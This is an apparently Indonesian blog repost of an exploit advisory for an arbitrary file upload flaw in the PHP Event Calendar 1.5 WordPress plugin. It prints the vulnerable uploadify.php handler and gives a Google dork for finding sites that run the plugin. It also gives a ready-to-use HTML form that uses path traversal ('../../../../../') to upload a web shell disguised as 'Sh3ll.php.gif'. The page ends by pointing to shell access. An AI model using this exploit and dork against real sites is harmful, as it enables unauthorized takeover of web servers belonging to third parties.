Halaman

WordPress PHP Event Calendar 1.5 Arbitrary File Upload

Kamis, 05 November 2015



#- Title: WordPress PHP Event Calendar Arbitrary File Upload
#- Author: CrashBandicot
#- Date: 04/02/2015
#- Vendor : phpeventcalendar. com
#- Developer : -
#- Link Download : Wordpress. org/plugins/php-event-calendar/
#- Google Dork: inurl:wp-content/plugins/php-event-calendar/
#- Tested on : MSwin
#- Fixed in Version : > 1.5
=======================================================================

 &- Vulnerability : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php ( "Uploadify.php" )


Bug Code :

<?php


/*


Uploadify


Copyright (c) 2012 Reactive Apps, Ronnie Garcia


Released under the MIT License <http://www.opensource.org/licenses/mit-license.php>


*/


// Define a destination


//$targetFolder = '/uploads'; // Relative to the root


$targetFolder = $_POST['targetFolder']; // wp upload directory


$dir = str_replace('\\','/',dirname(__FILE__));


//$verifyToken = md5('unique_salt' . $_POST['timestamp']);


if (!empty($_FILES)) {


    $tempFile = $_FILES['Filedata']['tmp_name'];


    //$targetPath = $dir.$targetFolder;


    $targetPath = $targetFolder;


    $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name'];


    $targetFile = rtrim($targetPath,'/') . '/' . $fileName;


    // Validate the file type


    $fileTypes = array('jpg','jpeg','gif','png'); // File extensions


    $fileParts = pathinfo($_FILES['Filedata']['name']);


    if (in_array($fileParts['extension'],$fileTypes)) {


        move_uploaded_file($tempFile,$targetFile);


        echo '1';


    } else {


        echo 'Invalid file type.';




    }




&- When Vulnerable : *Blank*

Proof Of Concept :

Material : Sh3ll.php.gif (if support) / Upload image.gif


HTML Code : 

<div><form action="http://3xploi7.com/wp-content/plugins/php-event-calendar/server/classes/uploadify.php"  method="post" enctype="multipart/form-data">
<input type="file" name="Filedata" id="file" ><br>
<input type="text" name="targetFolder" value="../../../../../" id="file" ><br>
<input type="text" name="user_id" value="3xploi7" id="file" ><br>
<input type="submit" name="submit" value="3xploi7ed !" >
</form></div>

Shell Acces ? Here


Tidak ada komentar:

Posting Komentar